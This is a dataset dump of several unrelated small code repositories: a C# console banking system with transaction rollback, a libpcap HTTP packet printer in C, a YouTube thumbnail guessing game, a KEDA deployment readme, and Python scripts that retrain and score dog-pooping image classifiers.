branch_name
stringclasses 149
values | text
stringlengths 23
89.3M
| directory_id
stringlengths 40
40
| languages
listlengths 1
19
| num_files
int64 1
11.8k
| repo_language
stringclasses 38
values | repo_name
stringlengths 6
114
| revision_id
stringlengths 40
40
| snapshot_id
stringlengths 40
40
|
|---|---|---|---|---|---|---|---|---|
refs/heads/main
|
<repo_name>aashlayarora/BankingSystem<file_sep>/005-code.cs
using System;
using System.Collections.Generic;
namespace AbstractedTransaction
{
public class Bank
{
List<Account> _accounts;
List<Transaction> _transactions;
public Bank()
{
_accounts = new List<Account>();
_transactions = new List<Transaction>();
}
public void AddAccount(Account account)
{
_accounts.Add(account);
}
public Account GetAccount(String name)
{
for (int i = 0; i < _accounts.Count; i++)
{
if (name.Equals(_accounts[i].Name))
return _accounts[i];
}
return null;
}
public void ExecuteTransaction(Transaction transaction)
{
_transactions.Add(transaction);
transaction.Execute();
transaction.Print();
}
public void RollbackTransaction(Transaction transaction)
{
transaction.Rollback();
}
public void PrintTransactionHistory()
{
for (int i = 0; i < _transactions.Count; i++)
{
Console.WriteLine("Transaction number:" + i);
Console.Write("status: ");
if (_transactions[i].Reversed)
Console.WriteLine("Reversed");
else if (_transactions[i].Success)
Console.WriteLine("Success");
else if (_transactions[i].Executed)
Console.WriteLine("executed");
Console.WriteLine("\n timestamp: " + _transactions[i].DateStamp);
_transactions[i].Print();
}
}
public Transaction FindTransaction(int transnum)
{
if (transnum < 0 || transnum >= _transactions.Count)
{
throw new InvalidOperationException(" Transaction entered in Invalid");
}
return _transactions[transnum];
}
}
}
<file_sep>/004-code.cs
using System;
namespace AbstractedTransaction
{
public interface TransactonInterface
{
void Print();
void Execute();
void Rollback();
bool Executed { get; }
bool Success { get; }
bool Reversed { get; }
}
enum MenuOption
{
AddAcc = 1,
Withdraw = 2,
Deposit = 3,
Transfer = 4,
Print = 5,
PrintHistory = 6,
Quit = 7
}
public class BankSystem
{
static Account FindAccount(Bank bank)
{
Console.WriteLine("Name of account which you want to find: ");
string n = Console.ReadLine();
Account resacc = bank.GetAccount(n);
if (resacc == null)
Console.WriteLine("Account does'nt exist!");
return resacc;
}
static MenuOption ReadUserInput()
{
int input;
do
{
Console.WriteLine("\nWelcome user!\n");
Console.WriteLine("To:\na)Add account enter'1'\nb)Withdraw enter'2'\nc)Deposit enter'3'\nd)tranfer enter'4'\ne)print enter'5'\nf)Print history enter 6\ng)Quit enter '7'\n enter choice: ");
input = Convert.ToInt32(Console.ReadLine());
} while (input < 1 || input > 7);
MenuOption option = (MenuOption)input;
return option;
}
static void DoprintingHistory(Bank bank)
{
bank.PrintTransactionHistory();
Console.WriteLine("Enter the number of transaction you want to rollback else enter '-1' to exit:");
int num = Convert.ToInt32(Console.ReadLine());
if (num != -1)
DoRollback(num, bank);
}
static void DoRollback(int transnum, Bank bank)
{
bank.RollbackTransaction(bank.FindTransaction(transnum));
}
static void DoWithdraw(Bank bank)
{
Account account = FindAccount(bank);
if (account != null)
{
Console.WriteLine("enter the amount you want to withdraw:");
int amount = Convert.ToInt32(Console.ReadLine());
WithdrawTransaction withdrawl = new WithdrawTransaction(account, amount);
bank.ExecuteTransaction(withdrawl);
}
}
static void DoDeposit(Bank bank)
{
Account account = FindAccount(bank);
if (account != null)
{
Console.WriteLine("enter the amount you want to deposit:");
int amount = Convert.ToInt32(Console.ReadLine());
DepositTransaction deposit = new DepositTransaction(account, amount);
bank.ExecuteTransaction(deposit);
}
}
static void DoTransfer(Bank bank)
{
Console.WriteLine("Withdrawl account:");
Account fromaccount = FindAccount(bank);
Console.WriteLine("Deposit account:");
Account toaccount = FindAccount(bank);
if (fromaccount != null && toaccount != null)
{
Console.WriteLine("enter the amount you want to transfer:");
int amount = Convert.ToInt32(Console.ReadLine());
TransferTransaction transfer = new TransferTransaction(fromaccount, toaccount, amount);
bank.ExecuteTransaction(transfer);
}
}
static void Print(Bank bank)
{
Account acc = FindAccount(bank);
if (acc != null)
acc.Print();
}
static void DoAddAccount(Bank bank)
{
Console.WriteLine("Name of account for which you want to add: ");
string n = Console.ReadLine();
Console.WriteLine("Enter balance in the account: ");
decimal b = Convert.ToDecimal(Console.ReadLine());
Account acc = new Account(b, n);
bank.AddAccount(acc);
}
public static void Main(string[] args)
{
int break_ = 0;
Bank bank = new Bank();
while (break_ != 1)
{
MenuOption option = ReadUserInput();
Console.WriteLine("YOU SELECTED TO" + option + "\n" + "To Change enter '1' else '0':");
int cnfrm = Convert.ToInt32(Console.ReadLine());
if (cnfrm == 1)
{
option = ReadUserInput();
Console.WriteLine("YOU SELECTED TO" + option + "\n");
}
try
{
switch (option)
{
case MenuOption.AddAcc:
{
DoAddAccount(bank);
break;
}
case MenuOption.Withdraw:
{
DoWithdraw(bank);
break;
}
case MenuOption.Deposit:
{
DoDeposit(bank);
break;
}
case MenuOption.Transfer:
{
DoTransfer(bank);
break;
}
case MenuOption.Print:
{
Print(bank);
break;
}
case MenuOption.PrintHistory:
{
DoprintingHistory(bank);
break;
}
case MenuOption.Quit:
{
break_ = 1;
break;
}
}
}
catch (InvalidOperationException err)
{
Console.WriteLine(err.Message);
}
}
}
}
}
<file_sep>/000-code.cs
using System;
namespace AbstractedTransaction
{
public class DepositTransaction : Transaction, TransactonInterface
{
Account _account;
public override bool Success
{
get { return _success; }
// set { _success = value; }
}
public DepositTransaction(Account account, decimal amount) : base(amount)
{
_account = account;
}
public override void Print()
{
if (Executed)
{
Console.WriteLine("transaction was executed..");
if (Success)
{
Console.WriteLine("transaction success..amount of" + _amount + "was deposited");
}
else if (Reversed)
{
Console.WriteLine("transaction unsuccessful.. rolling back..");
}
else
{
Console.WriteLine("transaction unsuccessful..");
}
}
else
Console.WriteLine("transaction wasn't executed..");
}
public override void Execute()
{
base.Execute();
if (Executed)
throw new InvalidOperationException("transaction already executed..");
else
{
if (_account.Deposit(_amount))
{
_success = true;
base.setExecute();
}
else
throw new InvalidOperationException("amount entered is invalid..");
}
}
public override void Rollback()
{
base.Rollback();
if (!Success)
{
throw new InvalidOperationException("Transaction didn't take place");
}
else if (Reversed)
{
throw new InvalidOperationException("Transaction roll back already done!");
}
else if (Success && !Reversed)
{
_account.Withdraw(_amount);
base.setReverese();
}
}
}
}
<file_sep>/006-code.cs
using System;
namespace AbstractedTransaction
{
public class Account
{
decimal _balance;
string _name;
public string Name
{
get { return _name; }
set { _name = value; }
}
public decimal Balance
{
get
{
return _balance;
}
}
public Account(decimal balance, string name)
{
Name = name;
_balance = balance;
}
public bool Deposit(decimal amount)
{
if (amount > 0)
{
_balance += amount;
return true;
}
else
{
return false;
}
}
public bool Withdraw(decimal amount)
{
if (_balance >= amount && amount > 0)
{
_balance -= amount;
return true;
}
else
{
return false;
}
}
public void Print()
{
Console.WriteLine("Name of account in which transactions happened: {0}", _name);
Console.WriteLine("After transaction: Updated Balance is: ${0}", _balance.ToString("C"));
}
}
}<file_sep>/001-code.cs
using System;
namespace AbstractedTransaction
{
public class WithdrawTransaction : Transaction, TransactonInterface
{
Account _account;
public override bool Success
{
get { return _success; }
//set { _success = value; }
}
public WithdrawTransaction(Account account, decimal amount) : base(amount)
{
_account = account;
_amount = amount;
}
public override void Print()
{
if (Executed)
{
Console.WriteLine("transaction executed..");
if (Success)
{
Console.WriteLine("sucess! an amount of " + _amount + "is withdrawn from your account");
}
else if (Reversed)
{
Console.WriteLine("transaction unsuccessfull! rolling back success");
}
else
{
Console.WriteLine("transaction unsuccessful");
}
}
else
{
Console.WriteLine("transaction couldn't take place");
}
}
public override void Execute()
{
base.Execute();
if (Executed)
throw new InvalidOperationException("the transaction has been already executed!");
else
{
if (_account.Withdraw(_amount))
{
// Console.WriteLine("fgjgk");
_success = true;
base.setExecute();
}
else
throw new InvalidOperationException(" insufficient funds!!");
}
}
public override void Rollback()
{
base.Rollback();
if (!_success)
{
throw new InvalidOperationException("Transaction didn't take place");
}
else if (Reversed)
{
throw new InvalidOperationException("Transaction roll back already done!");
}
else if (_success && !Reversed)
{
_account.Deposit(_amount);
base.setReverese();
}
}
}
}
<file_sep>/002-code.cs
using System;
namespace AbstractedTransaction
{
public class TransferTransaction : Transaction, TransactonInterface
{
Account _fromAccount;
Account _toAccount;
DepositTransaction _deposit;
WithdrawTransaction _withdraw;
public override bool Success
{
get
{
if (_deposit.Success && _withdraw.Success)
{
return true;
}
return false;
}
}
public TransferTransaction(Account fromAccount, Account toAccount, decimal amount) : base(amount)
{
_fromAccount = fromAccount;
_toAccount = toAccount;
DepositTransaction deposit = new DepositTransaction(toAccount, amount);
_deposit = deposit;
WithdrawTransaction withdraw = new WithdrawTransaction(fromAccount, amount);
_withdraw = withdraw;
}
public override void Print()
{
if (Success)
{
Console.WriteLine("Transferred $" + _amount + " from " + _fromAccount.Name + " to " + _toAccount.Name);
_withdraw.Print();
_deposit.Print();
}
else if (Reversed)
Console.WriteLine("transaction rolled back..");
else
Console.WriteLine("Transaction unsuccessfull!");
}
public override void Execute()
{
base.Execute();
if (Executed)
{
throw new InvalidOperationException("The transfer transaction has been already attempted");
}
if (_amount > _fromAccount.Balance)
{
throw new InvalidOperationException("Insuffiecient funds!");
}
_withdraw.Execute();
if (_withdraw.Success)
{
_deposit.Execute();
if (!_deposit.Success)
{
_withdraw.Rollback();
}
}
base.setExecute();
}
public override void Rollback()
{
base.Rollback();
if (!Success)
{
throw new InvalidOperationException("Transaction wasn't success..");
}
else if (Reversed)
{
throw new InvalidOperationException("Transaction already rolled back. .");
}
else
{
_deposit.Rollback();
_withdraw.Rollback();
base.setReverese();
}
}
}
}
<file_sep>/003-code.cs
using System;
namespace AbstractedTransaction
{
public abstract class Transaction
{
protected decimal _amount;
protected bool _success;
private bool _executed;
private bool _reversed;
DateTime _dateStamp;
abstract public bool Success
{ get; }
public bool Executed
{
get { return _executed; }
}
public bool Reversed
{
get { return _reversed; }
}
public DateTime DateStamp
{
get { return _dateStamp; }
}
public Transaction(decimal amount)
{
_amount = amount;
}
public abstract void Print();
public virtual void Execute()
{
_dateStamp = DateTime.Now;
}
public virtual void Rollback()
{
_dateStamp = DateTime.Now;
}
public void setExecute()
{
_executed = true;
}
public void setReverese()
{
_reversed = true;
}
}
}
<file_sep>/README.md
# BankingSystem
Made complete banking functional system in C# in which we can create multiple account, withdraw, deposit, transferring between specific or two different accounts, printing the statements after and before transactions, roll back of transaction in case of discrepancies and use of error and exception handling to minimize the effort
|
47cb715504cc5aa7d63a81a9ac78188a4312357d
|
[
"Markdown",
"C#"
] | 8
|
C#
|
aashlayarora/BankingSystem
|
31cd20434e9f17eec64f7d97a50cf2814e0d05cc
|
1fbddce2da868407bc13cceeb77d6e351688eb4b
|
refs/heads/main
|
<repo_name>renatogroffe/Kubernetes-KEDA-ServiceBusQueue_ContagemAcessos_1-10_Pods<file_sep>/keda-instalacao.sh
kubectl create namespace keda
helm repo add kedacore https://kedacore.github.io/charts
helm install keda kedacore/keda --namespace keda<file_sep>/README.md
# Kubernetes-KEDA-ServiceBusQueue_ContagemAcessos_1-10_Pods
Objetos para Deployment de um Worker Service (contagem de acessos) no Kubernetes utilizando KEDA, Helm, Azure Service Bus (Queue) e um Worker criado .NET 6. Foi definido um ScaledObject com um mínimo de 1 e um máximo de 10 Pods.
Worker Service para consumo de **mensagens vinculadas a uma fila do Azure Service Bus** (imagem **renatogroffe/workercontagem-servicebusqueue-dotnet6**) - é justamente esta aplicação que será escalada via **KEDA**:
**https://github.com/renatogroffe/DotNet6-WorkerService-AzureServiceBus-SqlServer_ContagemAcessos**
Projeto que serviu de base para o **envio de mensagens a uma fila do Azure Service Bus** (imagem **renatogroffe/apicontagem-servicebusqueue-dotnet6**):
**https://github.com/renatogroffe/ASPNETCore6-REST_API-AzureServiceBus_ContagemAcessos**
No arquivo **keda-instalacao⋅sh** estão as instruções para instalação do KEDA **(Kubernetes Event-driven Autoscaling)** em um **cluster Kubernetes**.
Para os testes de carga que escalam a aplicação utilizei o pacote npm [**loadtest**](https://www.npmjs.com/package/loadtest). O exemplo a seguir procerá com o envio de **3 mil requisições**, simulando **50 usuários concorrentes**:
**loadtest -c 50 -n 3000 -k** ***ENDPOINT***
|
9a9f52a2a80c9d1578fa92d4d08de30f12a58f5d
|
[
"Markdown",
"Shell"
] | 2
|
Shell
|
renatogroffe/Kubernetes-KEDA-ServiceBusQueue_ContagemAcessos_1-10_Pods
|
f9d456d82f0094f96c9b6b8fffac51a36c9a0c63
|
9cae016ea48cbc38e8b23188438f1d39fc908d56
|
HEAD
|
<file_sep>{
"version": 1495721860,
"fileList": [
"data.js",
"c2runtime.js",
"jquery-2.1.1.min.js",
"offlineClient.js",
"images/tankcat-sheet0.png",
"images/tankcat-sheet1.png",
"images/tankcat-sheet2.png",
"images/tiledbackground.png",
"images/btnright-sheet0.png",
"images/btnleft-sheet0.png",
"images/newpiskel-sheet0.png",
"images/particles.png",
"images/newpiskel2-sheet0.png",
"images/newpiskel3-sheet0.png",
"images/tiledbackground2.png",
"images/bulletball-sheet0.png",
"images/explode-sheet0.png",
"images/explode-sheet1.png",
"images/badheli-sheet0.png",
"images/badheli-sheet1.png",
"images/deskp-sheet0.png",
"images/mon-sheet0.png",
"images/kitch-sheet0.png",
"images/bed-sheet0.png",
"images/tiledbackground3.png",
"images/door-sheet0.png",
"images/tv-sheet0.png",
"images/speak-sheet0.png",
"images/health-sheet0.png",
"images/newpiskel4-sheet0.png",
"images/jetkill-sheet0.png",
"images/car-sheet0.png",
"images/tankcatfake-sheet0.png",
"images/sprite3-sheet0.png",
"images/sprite3-sheet1.png",
"images/sprite3-sheet2.png",
"images/50point-sheet0.png",
"images/pointpart.png",
"images/crate-sheet0.png",
"images/jet-sheet0.png",
"images/sprite-sheet0.png",
"images/newpiskel5-sheet0.png",
"images/bullet-sheet0.png",
"images/catjetbutton-sheet0.png",
"images/specials-sheet0.png",
"images/sprite2-sheet0.png",
"images/lasersp-sheet0.png",
"images/smenuback-sheet0.png",
"images/lasermessage-sheet0.png",
"images/coin-sheet0.png",
"images/title2-sheet0.png",
"images/tiledbackground4.png",
"images/newpiskel6-sheet0.png",
"images/sprite4-sheet0.png",
"images/shoplogo2-sheet0.png",
"images/homebutton-sheet0.png",
"images/buybutton-sheet0.png",
"images/buybutton-sheet1.png",
"images/fasttank-sheet0.png",
"images/jump-sheet0.png",
"images/wash-sheet0.png",
"images/sprite5-sheet0.png",
"images/sprite5-sheet1.png",
"images/mapor-sheet0.png",
"images/blanksp-sheet0.png",
"images/pause-sheet0.png",
"images/exit-sheet0.png",
"images/dtaptojump-sheet0.png",
"images/tiledbackground7.png",
"images/loading-sheet0.png",
"images/forcefield-sheet0.png",
"images/buyff-sheet0.png",
"images/holdff-sheet0.png",
"images/burn.png",
"images/back-sheet0.png",
"images/yourscore-sheet0.png",
"images/submitscore-sheet0.png",
"images/showscore-sheet0.png",
"media/explode.m4a",
"media/explode.ogg",
"media/hit.m4a",
"media/hit.ogg",
"media/shoot.m4a",
"media/shoot.ogg",
"media/jet.m4a",
"media/jet.ogg",
"media/point.m4a",
"media/point.ogg",
"media/spawn.m4a",
"media/spawn.ogg",
"media/powerup.m4a",
"media/powerup.ogg",
"media/laser_shoot.m4a",
"media/laser_shoot.ogg",
"media/laser.m4a",
"media/laser.ogg",
"loading-logo.png",
"icon-16.png",
"icon-32.png",
"icon-114.png",
"icon-128.png",
"icon-256.png",
"cordova.oauth2.js"
]
}<file_sep>var youtubeVids = [];
var mostPop = '';
var mostPopName = '';
var searchDone = false;
var guessed = false;
function loadGame(){
var userInput = document.getElementById('youtubeInput').value;
var youtubeAPI = "https://www.googleapis.com/youtube/v3/search?part=snippet&q=" + userInput + "®ionCode=gb&order=viewCount&type=video&maxResults=8&key=<KEY>"
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
// Typical action to be performed when the document is ready:
var youtubeData = JSON.parse(xhttp.responseText);
youtubeVids.push(youtubeData.items[0].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[1].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[2].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[3].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[4].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[5].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[6].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[7].snippet.thumbnails.high.url);
mostPop = (youtubeData.items[0].snippet.thumbnails.high.url);
mostPopName = (youtubeData.items[0].snippet.title);
console.log(mostPop);
console.log(mostPopName);
searchDone = true;
guessed = false;
reset()
setImg()
}
};
xhttp.open("GET", youtubeAPI, true);
xhttp.send();
}
function setImg(){
var randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb1").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb2").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb3").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb4").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb5").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb6").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb7").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb8").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
document.getElementById("results").style.display = "block";
document.getElementById("question").innerHTML = "Which of the following do you think got the most views?"
}
function checkForCorrect(){
var count = 1;
while (document.getElementById("thumb"+count).src != mostPop){
count += 1;
}
return count;
}
function guess(selection){
if (guessed == false){
guessed = true;
if (document.getElementById("thumb"+selection).src == mostPop){
document.getElementById("thumb"+checkForCorrect()).style.transform = "scale(1.2)"
document.getElementById("question").innerHTML = "That's correct!! '"+mostPopName+"' was the the most popular."
}
else{
document.getElementById("thumb"+checkForCorrect()).style.transform = "scale(1.2)"
document.getElementById("question").innerHTML = "Sorry, it was '"+mostPopName+"'. Try another search term."
}
}
}
function reset(){
var pic = 1
while (pic <= 8){
document.getElementById("thumb"+pic).style.transform = ""
pic += 1
}
}
|
a7a3201e6c878c3198cd9324ce13a4056afde8a4
|
[
"JavaScript"
] | 2
|
JavaScript
|
debelsoftware/videorank
|
e8400ab4124aa3bda8bf6b8897d33a981dd92916
|
642b7dd075e0da330038ad3fa6251a660f8e7410
|
refs/heads/main
|
<repo_name>sajaalraja/arrow-function<file_sep>/app.js
"use strict"
let sayhi;
sayhi = () => {
return "hi";
}
document.getElementById("arrow").innerHTML = sayhi();
|
ad0430f1ec70e1580a614762dfbbda5eb01e0261
|
[
"JavaScript"
] | 1
|
JavaScript
|
sajaalraja/arrow-function
|
ab16bad09cbf685c010d1170333c96dc5cb5e62e
|
54c055ba4e6e82accd7fd67d8b5934d80a84afef
|
refs/heads/master
|
<repo_name>Kur0N3k0/pcap_prog<file_sep>/Makefile
all : pcap_prog
LIBS = pcap
pcap_prog :
gcc -o pcap pcap.c -l$(LIBS)
clean :
rm -f pcap
<file_sep>/pcap.c
#include <pcap.h>
#include <stdio.h>
#include <ctype.h>
#include <stdint.h>
#include <arpa/inet.h>
#include <net/ethernet.h>
#include <netinet/in.h>
typedef struct ethernet{
uint8_t dest[6];
uint8_t src[6];
uint16_t type;
} ethernet;
typedef struct ip{
uint8_t hdr_len:4;
uint8_t version:4;
uint8_t tos;
uint16_t total_len;
uint16_t id;
uint8_t ip_frag_offset:5;
uint8_t ip_more_fragment:1;
uint8_t ip_dont_fragment:1;
uint8_t ip_reserved_zero:1;
uint8_t ip_frag_offset1;
uint8_t ip_ttl;
uint8_t ip_protocol;
uint16_t ip_checksum;
struct in_addr ip_srcaddr;
struct in_addr ip_destaddr;
} ip;
typedef struct tcp{
uint16_t source_port;
uint16_t dest_port;
uint32_t sequence;
uint32_t acknowledge;
uint8_t ns:1;
uint8_t reserved_part1:3;
uint8_t data_offset:4;
uint8_t fin:1;
uint8_t syn:1;
uint8_t rst:1;
uint8_t psh:1;
uint8_t ack:1;
uint8_t urg:1;
uint8_t ecn:1;
uint8_t cwr:1;
uint16_t window;
uint16_t checksum;
uint16_t urgent_pointer;
} tcp;
void getmac(const char *byte){
int i;
for(i = 0; i < 5; i++)
printf("%02x:", *(uint8_t *)&byte[i]);
printf("%02x\n", *(uint8_t *)&byte[i]);
}
int main(int argc, char *argv[])
{
pcap_t *handle; /* Session handle */
char *dev; /* The device to sniff on */
char errbuf[PCAP_ERRBUF_SIZE]; /* Error string */
struct bpf_program fp; /* The compiled filter */
char filter_exp[] = "port 80"; /* The filter expression */
bpf_u_int32 mask; /* Our netmask */
bpf_u_int32 net; /* Our IP */
struct pcap_pkthdr *header; /* The header that pcap gives us */
ethernet *eth;
ip *iph;
tcp *tcph;
char *buf = NULL;
//const u_char *packet; /* The actual packet */
int res;
int i;
if(argc != 2){
printf("[Usage] ./pcap [network_device]\n");
return 0;
}
/* Open the session in promiscuous mode */
handle = pcap_open_live(argv[1], BUFSIZ, 1, 1000, errbuf);
if (handle == NULL) {
fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);
return(2);
}
/* Compile and apply the filter */
if (pcap_compile(handle, &fp, filter_exp, 0, net) == -1) {
fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(handle));
return(2);
}
if (pcap_setfilter(handle, &fp) == -1) {
fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(handle));
return(2);
}
char ip_src[17] = { 0, };
char ip_dst[17] = { 0, };
while(1){ /* Grab a packet */
res = pcap_next_ex(handle, &header, (const u_char **)ð);
if(res <= 0)
continue;
if (ntohs(eth->type) != ETHERTYPE_IP){
printf("Not IP type! %x\n", eth->type);
continue;
}
iph = (ip *)((char *)eth + sizeof(ethernet));
inet_ntop(AF_INET, (const char *)&iph->ip_srcaddr, ip_src, 17);
inet_ntop(AF_INET, (const char *)&iph->ip_destaddr, ip_dst, 17);
if (iph->ip_protocol != IPPROTO_TCP){
printf("Not tcp protocol! %x\n", iph->ip_protocol);
continue;
}
tcph = (tcp *)((char *)iph + iph->hdr_len * 4);
unsigned int data_len = ntohs(iph->total_len);
unsigned int off = tcph->data_offset * 4 + iph->hdr_len * 4;
if(data_len <= off){
continue;
}
else data_len -= off;
printf("source mac : ");
getmac(eth->src);
printf("dest mac : ");
getmac(eth->dest);
printf("source ip : %s\n", ip_src);
printf("dest ip : %s\n", ip_dst);
printf("source port : %d\n", ntohs(tcph->source_port));
printf("dest port : %d\n", ntohs(tcph->dest_port));
buf = (char *)((char *)tcph + tcph->data_offset * 4);
for(i = 0; i < data_len; i++){
if(isprint(buf[i]))
printf("%c", buf[i]);
else
printf(".");
}
puts("");
}
pcap_close(handle);
return(0);
}
|
5f6b846f17b3cf2d0c39582c3d2b85c37fdad999
|
[
"C",
"Makefile"
] | 2
|
Makefile
|
Kur0N3k0/pcap_prog
|
93b77a90eade01ad3ef46bfbd7a84a3eb9d92f14
|
891570809883fead61b453abc4a1ae29a5e52b22
|
refs/heads/master
|
<file_sep>import retrain as r
import sys
import json
import os
from pathlib import Path
model_list = []
cur_path = Path(os.getcwd())
base_dir = cur_path.parent
code_dir = str(cur_path)
image_dir = os.path.join(base_dir, "Images")
with open("./pooMeta.json") as f:
model_list = json.load(f)
print(model_list)
for model in model_list:
model_dir = os.path.join(base_dir, "models\\"+model["model"]+"\\"+model["iteration"])
module = model["module"]
model_name = model["model"]
iteration = model["iteration"]
number_of_steps = model["number_of_steps"]
summaries_dir = os.path.join(model_dir, model["summaries_dir"])
output_labels = os.path.join(model_dir, model["output_labels"])
output_graph = os.path.join(model_dir, model["output_graph"])
random_crop = model["random_crop"]
random_brightness = model["random_brightness"]
sys.argv = (
['./retrain.py', '--image_dir', image_dir,
'--how_many_training_steps', number_of_steps,
'--tfhub_module', module,
'--summaries_dir', summaries_dir,
'--output_labels', output_labels,
'--output_graph', output_graph,
'--random_crop', random_crop,
'--random_brightness', random_brightness,
]
)
r.run_app()
<file_sep># Dog_Pooping_Recognition
Image recognition project, to predict whether a dog was pooping or not. The idea would be to use it as a part of a product to hold pet owners accountable for picking up after their dogs, creating cleaner public spaces.
<file_sep>import os
import label_image as li
import json
def main():
models = ["Resnet2","Resnet3","Resnet4","Inception2","Inception3","Inception4","Mobilenet2","Mobilenet3","Mobilenet4"]
res = [224,224,224,299,299,299,224,224,224]
#Resnet (224 X 224)
#Inception (299 X 299)
#Mobilenet (224 X 224)
mydir = "G:/My Drive/Analytic Apps/DApps_Project/Test_Images/"
# Read in actuals
with open("actuals.json", "r") as read_file: # change this line to actuals.json once done testing
actuals = json.load(read_file)
actuals = actuals[0]
#print(actuals)
# Get a list of all the test images
images = list(actuals.keys())
#print(images)
# Create a dictionary to store predictions for each model
preds = {}
# Loop through all the models
for m in range(len(models)):
model = models[m][:-1]
print(model)
num = models[m][-1:]
print(num)
# Loop through all the images
for dirs, subdirs, files in os.walk(mydir):
for f in files:
print(f)
# Build path to test image, model graph, and model label
if f == "desktop.ini":
continue
image = dirs + f
graph = "G:/My Drive/Analytic Apps/DApps_Project/Models/" +model +"/" +num +"/output_graph.pb"
labels = "G:/My Drive/Analytic Apps/DApps_Project/Models/" +model +"/" +num +"/output_labels.txt"
#print(graph)
#print(labels)
# Get the predicted classes
if models[m] not in preds.keys():
preds[models[m]] = {}
preds[ models[m] ][ f ] = li.label_image(graph=graph, labels=labels, image=image, height=res[m], width=res[m])
else:
preds[ models[m] ][ f ] = li.label_image(graph=graph, labels=labels, image=image, height=res[m], width=res[m])
#print(preds)
# Get the total number of images
total = len(images)
#print(total)
# Create a dictionary to store the accuracy scores for each model tuned on three different learning rates
acc_obj = {}
# Loop through each model to create a confusion matrix, accuracy, recall, and precision score and write it out to a file
for mod in models:
model = mod[:-1]
#print(model)
# Create a 2D list to store the confusion matrix for each model
cf = [ #Actual
[0,0], #Predicted - DP
[0,0] # - DNP
]
# Fill in the confusion matrix
for img in images:
if preds[mod][img] == 'dog pooping' and actuals[img] == 'dog pooping':
cf[0][0] += 1
elif preds[mod][img] == 'dog pooping' and actuals[img] == 'dog not pooping':
cf[0][1] += 1
elif preds[mod][img] == 'dog not pooping' and actuals[img] == 'dog pooping':
cf[1][0] += 1
elif preds[mod][img] == 'dog not pooping' and actuals[img] == 'dog not pooping':
cf[1][1] += 1
#print(cf)
# Calculate the metrics for the model based on the confusion matrix
accuracy = (cf[0][0] + cf[1][1]) / total
recall = cf[0][0] / (cf[0][0] + cf[1][0])
precision = cf[0][0] / (cf[0][0] + cf[0][1])
#print('Accuracy:', accuracy)
#print('Recall:', recall)
#print('Precision:', precision)
# Fill the accuracy dictionary
if model not in acc_obj.keys():
acc_obj[model] = [accuracy]
else:
acc_obj[model].append(accuracy)
# Write the confusion matrix and metrics out to a text file
out = open("G:/My Drive/Analytic Apps/DApps_Project/Results2/" +mod, "w")
out.write(mod +" Results\n")
out.write("Confusion Matrix\n")
out.write(str(cf[0][0]) +" " +str(cf[0][1]) +"\n")
out.write(str(cf[1][0]) +" " +str(cf[1][1]) +"\n")
out.write("Accuracy\n")
out.write(str(accuracy) +"\n")
out.write("Recall\n")
out.write(str(recall) +"\n")
out.write("Precision\n")
out.write(str(precision) +"\n")
out.close()
print(acc_obj)
# Score the ensemble model
# # Create a list that contains the which iteration of each model is the best in terms of accuracy
best_mods = []
for k,v in acc_obj.items():
b_mod = k + str(v.index(max(v))+2)
best_mods.append(b_mod)
print(best_mods)
ens_preds = {}
for image in images:
dp_cnt = 0
dnp_cnt = 0
for model in best_mods:
if preds[model][image] == 'dog pooping':
dp_cnt += 1
else:
dnp_cnt += 1
if dp_cnt > dnp_cnt:
ens_preds[image] = 'dog pooping'
else:
ens_preds[image] = 'dog not pooping'
print(ens_preds)
# Create a confusion matrix for the ensemble model
cf_ens = [ #Actual
[0,0], #Predicted - DP
[0,0] # - DNP
]
for im in images:
if ens_preds[im] == 'dog pooping' and actuals[im] == 'dog pooping':
cf_ens[0][0] += 1
elif ens_preds[im] == 'dog pooping' and actuals[im] == 'dog not pooping':
cf_ens[0][1] += 1
elif ens_preds[im] == 'dog not pooping' and actuals[im] == 'dog pooping':
cf_ens[1][0] += 1
elif ens_preds[im] == 'dog not pooping' and actuals[im] == 'dog not pooping':
cf_ens[1][1] += 1
# print(cf_ens)
# print()
# Calculate the metrics for the model
accuracy_ens = (cf_ens[0][0] + cf_ens[1][1]) / total
recall_ens = cf_ens[0][0] / (cf_ens[0][0] + cf_ens[1][0])
precision_ens = cf_ens[0][0] / (cf_ens[0][0] + cf_ens[0][1])
# print('Accuracy:', accuracy_ens)
# print('Recall:', recall_ens)
# print('Precision:', precision_ens)
# Write the confusion matrix and metrics out to a text file
out = open("G:/My Drive/Analytic Apps/DApps_Project/Results2/Ensemble", "w")
out.write("Ensemble Results\n")
out.write("Confusion Matrix\n")
out.write(str(cf_ens[0][0]) +" " +str(cf_ens[0][1]) +"\n")
out.write(str(cf_ens[1][0]) +" " +str(cf_ens[1][1]) +"\n")
out.write("Accuracy\n")
out.write(str(accuracy_ens) +"\n")
out.write("Recall\n")
out.write(str(recall_ens) +"\n")
out.write("Precision\n")
